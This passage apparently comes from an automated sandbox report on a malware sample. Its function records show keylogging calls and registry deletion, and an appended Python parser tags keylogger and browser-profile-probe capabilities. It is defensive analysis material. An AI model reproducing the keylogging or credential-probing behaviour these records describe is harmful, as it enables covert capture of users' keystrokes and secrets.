                                • Instruction Fuzzy Hash: 2AF05430900219A6C604FBA6CC479EF7B6C9A50709B40047FB901722D3EEB99A4586DD
                                APIs
                                • GetKeyState.USER32(00000011), ref: 0040A597
                                  • Part of subcall function 00409468: GetForegroundWindow.USER32 ref: 0040949C
                                  • Part of subcall function 00409468: GetWindowThreadProcessId.USER32(00000000,?), ref: 004094A7
                                  • Part of subcall function 00409468: GetKeyboardLayout.USER32(00000000), ref: 004094AE
                                  • Part of subcall function 00409468: GetKeyState.USER32(00000010), ref: 004094B8
                                  • Part of subcall function 00409468: GetKeyboardState.USER32(?), ref: 004094C5
                                  • Part of subcall function 00409468: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 004094E1
                                  • Part of subcall function 0040962E: SetEvent.KERNEL32(?,?,00000000,0040A156,00000000), ref: 0040965A
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: State$KeyboardWindow$EventForegroundLayoutProcessThreadUnicode
                                • String ID: [AltL]$[AltR]
                                • API String ID: 3195419117-2658077756
                                • Opcode ID: 93bc4c82374cea9adc1be0e1e00b15a6865a0a166cb0b06a72cbb1eb968038fe
                                • Instruction ID: 29e442ca109236f59d068076b5b59df2bd5c1a98fb0e5871b2f0b43888bf59e1
                                • Opcode Fuzzy Hash: 93bc4c82374cea9adc1be0e1e00b15a6865a0a166cb0b06a72cbb1eb968038fe
                                • Instruction Fuzzy Hash: E0E0E52170432026C828363E2D2B6AE39109741761B80006FF8436B2C6EC7E8D1043CF
                                APIs
                                • GetKeyState.USER32(00000012), ref: 0040A5F1
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: State
                                • String ID: [CtrlL]$[CtrlR]
                                • API String ID: 1649606143-2446555240
                                • Opcode ID: 32d4ed10a71edebd33ac4b48b63deb44ff05106530e36cbcea7ee1510555eeab
                                • Instruction ID: c9b4056729f6320a31326482d9effdd17bd0eb8d0dea22e3f8a852eb4ad5c27f
                                • Opcode Fuzzy Hash: 32d4ed10a71edebd33ac4b48b63deb44ff05106530e36cbcea7ee1510555eeab
                                • Instruction Fuzzy Hash: 53E02672B043112AC414397E551EA2A286087917A9F46042FECC3672C3D87F8D2203CF
                                APIs
                                • RegOpenKeyExW.ADVAPI32(80000001,00000000,00000000,00000002,00000000,80000001,6h@,004123E9,00000000,00000000,6h@,origmsc,00000000), ref: 00412422
                                • RegDeleteValueW.ADVAPI32(?,?), ref: 00412436
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: DeleteOpenValue
                                • String ID: 6h@
                                • API String ID: 2654517830-73392143
                                • Opcode ID: 45be350e15fffb6ae5252e7309d7a4a092feaea6bf63e3a5136c94c60f555a57
                                • Instruction ID: b623b948bfdfa0337ccefb4abe002260ff2e01b184ebd3416e4b53d264740477
                                • Opcode Fuzzy Hash: 45be350e15fffb6ae5252e7309d7a4a092feaea6bf63e3a5136c94c60f555a57
                                • Instruction Fuzzy Hash: 9BE0C231244208BBDF108F71DE07FFA372CDB01F01F5042A5BD0592091C666CE149664
                                APIs
                                • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D35), ref: 0043B4DB
                                • GetLastError.KERNEL32 ref: 0043B4E9
                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043B544
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharMultiWide$ErrorLast
                                • String ID:
                                • API String ID: 1717984340-0
                                • Opcode ID: b03ae9dac27993159e2f076845c08d8301cee77c5f079c52009939e8645c9409
                                • Instruction ID: 0ecaebee41cb6558e50c6262f5020644a21471e748dd5a13caac6b8f2b864e38
                                • Opcode Fuzzy Hash: b03ae9dac27993159e2f076845c08d8301cee77c5f079c52009939e8645c9409
                                • Instruction Fuzzy Hash: AD411630600205BFDB229F65D844B6B7BB4EF09328F14516EFA59AB3A1DB38CD01C799
                                APIs
                                • IsBadReadPtr.KERNEL32(?,00000014), ref: 004105F1
                                • IsBadReadPtr.KERNEL32(?,00000014), ref: 004106BD
                                • SetLastError.KERNEL32(0000007F), ref: 004106DF
                                • SetLastError.KERNEL32(0000007E,00410955), ref: 004106F6
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLastRead
                                • String ID:
                                • API String ID: 4100373531-0
                                • Opcode ID: 9879e5f97f9034714067de51e7f9b75c8f83f84791738768acf52853c1cf03dd
                                • Instruction ID: 0e21605053d2ba8273329305491efaf700724209343246308e891da9604144dc
                                • Opcode Fuzzy Hash: 9879e5f97f9034714067de51e7f9b75c8f83f84791738768acf52853c1cf03dd
                                • Instruction Fuzzy Hash: 73417C71644305DFE7208F18DC84BA7B7E4FF88714F00442EE54687691EBB5E8A5CB19
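The function records above (browser profile probes via PathFileExistsW with UserProfile/AppData-relative paths, GetKeyState/ToUnicodeEx with [AltL]/[CtrlL] tags, RegOpenKeyExW on HKEY_CURRENT_USER followed by RegDeleteValueW) are the kind of evidence an analyst wants to pull out of a report like this mechanically. The following is an added example, not Joe Sandbox tooling and not code from the sample: it parses records in the format shown on this page into structured calls and strings, then labels capabilities with rules of my own. The record grammar (an "APIs" heading opening a record, "•" bullets, "Function.MODULE(args), ref: ADDR" call lines, "Part of subcall function XXXXXXXX:" prefixes, "String ID" values joined with "$") is inferred from the excerpt; the capability names and path markers are assumptions, and the SAMPLE text is constructed from abbreviated copies of three records above.

```python
"""Parse Joe Sandbox function records into indicators and label capabilities.

Added example (not Joe Sandbox code). Record grammar is inferred from the
report excerpt; rule names and markers below are this example's assumptions.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Set

# Constructed from abbreviated copies of three records in the report above.
SAMPLE = """\
APIs
• PathFileExistsW.SHLWAPI(00000000,\\AppData\\Local\\Google\\Chrome\\,00000000,?,?,?,?,?,?,0040B53E), ref: 0040B437
Strings
Similarity
• API ID: ExistsFilePath
• String ID: UserProfile$\\AppData\\Local\\Google\\Chrome\\
• Opcode ID: 3eb312a051bd7b3e881279eab24470592b62138a753e29912da0ff6a2ccc73a2
APIs
• GetKeyState.USER32(00000011), ref: 0040A597
  • Part of subcall function 00409468: GetForegroundWindow.USER32 ref: 0040949C
  • Part of subcall function 00409468: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 004094E1
Similarity
• String ID: [AltL]$[AltR]
• Opcode ID: 93bc4c82374cea9adc1be0e1e00b15a6865a0a166cb0b06a72cbb1eb968038fe
APIs
• RegOpenKeyExW.ADVAPI32(80000001,00000000,00000000,00000002,00000000,80000001,6h@,004123E9,00000000,00000000,6h@,origmsc,00000000), ref: 00412422
• RegDeleteValueW.ADVAPI32(?,?), ref: 00412436
Similarity
• String ID: 6h@
• Opcode ID: 45be350e15fffb6ae5252e7309d7a4a092feaea6bf63e3a5136c94c60f555a57
"""

# "Function.MODULE(args), ref: ADDR" or "Function.MODULE ref: ADDR" (no args).
CALL_RE = re.compile(
    r"(?P<func>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,?\s+ref:\s+(?P<ref>[0-9A-Fa-f]{8})"
)
SUBCALL_RE = re.compile(r"Part of subcall function (?P<parent>[0-9A-Fa-f]{8}):\s*(?P<rest>.*)")


@dataclass
class Call:
    func: str
    module: str
    args: List[str]
    ref: str
    subcall_of: Optional[str] = None  # parent function address when listed as a subcall


@dataclass
class FunctionRecord:
    calls: List[Call] = field(default_factory=list)
    strings: List[str] = field(default_factory=list)  # "String ID" split on '$'
    opcode_id: Optional[str] = None


def parse_records(text: str) -> List[FunctionRecord]:
    """Each 'APIs' heading opens a new record; bullets are calls or metadata."""
    records: List[FunctionRecord] = []
    current: Optional[FunctionRecord] = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = FunctionRecord()
            records.append(current)
            continue
        if current is None or not line.startswith("•"):
            continue
        body, parent = line[1:].strip(), None
        sub = SUBCALL_RE.match(body)
        if sub:
            parent, body = sub.group("parent"), sub.group("rest")
        if body.startswith("String ID:"):
            current.strings = [s for s in body[len("String ID:"):].strip().split("$") if s]
            continue
        if body.startswith("Opcode ID:"):
            current.opcode_id = body[len("Opcode ID:"):].strip()
            continue
        call = CALL_RE.match(body)
        if call:
            args = call.group("args").split(",") if call.group("args") is not None else []
            current.calls.append(Call(call.group("func"), call.group("module"), args, call.group("ref"), parent))
    return records


# Assumed markers: browser profile directories seen in the report's strings,
# keylogger modifier tags, and the HKEY_CURRENT_USER handle value 0x80000001.
BROWSER_PROFILE_MARKERS = ("\\Google\\Chrome\\", "\\Microsoft\\Edge\\", "\\Opera Software\\")
MODIFIER_TAGS = ("[AltL]", "[AltR]", "[CtrlL]", "[CtrlR]", "[ShiftL]", "[ShiftR]")
HKEY_CURRENT_USER = "80000001"


def classify(rec: FunctionRecord) -> Set[str]:
    """Label a record with capability tags (names are this example's own)."""
    funcs = {c.func for c in rec.calls}
    tags: Set[str] = set()
    if "PathFileExistsW" in funcs and any(m in s for s in rec.strings for m in BROWSER_PROFILE_MARKERS):
        tags.add("browser-profile-probe")
    if "GetKeyState" in funcs and ("ToUnicodeEx" in funcs or any(t in rec.strings for t in MODIFIER_TAGS)):
        tags.add("keylogger")
    if "RegDeleteValueW" in funcs and any(
        c.func == "RegOpenKeyExW" and c.args and c.args[0] == HKEY_CURRENT_USER for c in rec.calls
    ):
        tags.add("hkcu-value-deletion")
    return tags


def indicators(text: str) -> List[dict]:
    """Return only records that triggered a rule, with the evidence behind it."""
    out = []
    for rec in parse_records(text):
        tags = classify(rec)
        if tags:
            out.append({"opcode_id": rec.opcode_id, "tags": sorted(tags),
                        "apis": sorted({c.func for c in rec.calls}), "strings": rec.strings})
    return out


if __name__ == "__main__":
    for ind in indicators(SAMPLE):
        print(ind)
```

Records that no rule labels (for example the MultiByteToWideChar and IsBadReadPtr/SetLastError records above) still parse, so new rules can be added without touching the parser; the Opcode ID is carried through because it is the stable key for correlating the same function across reports.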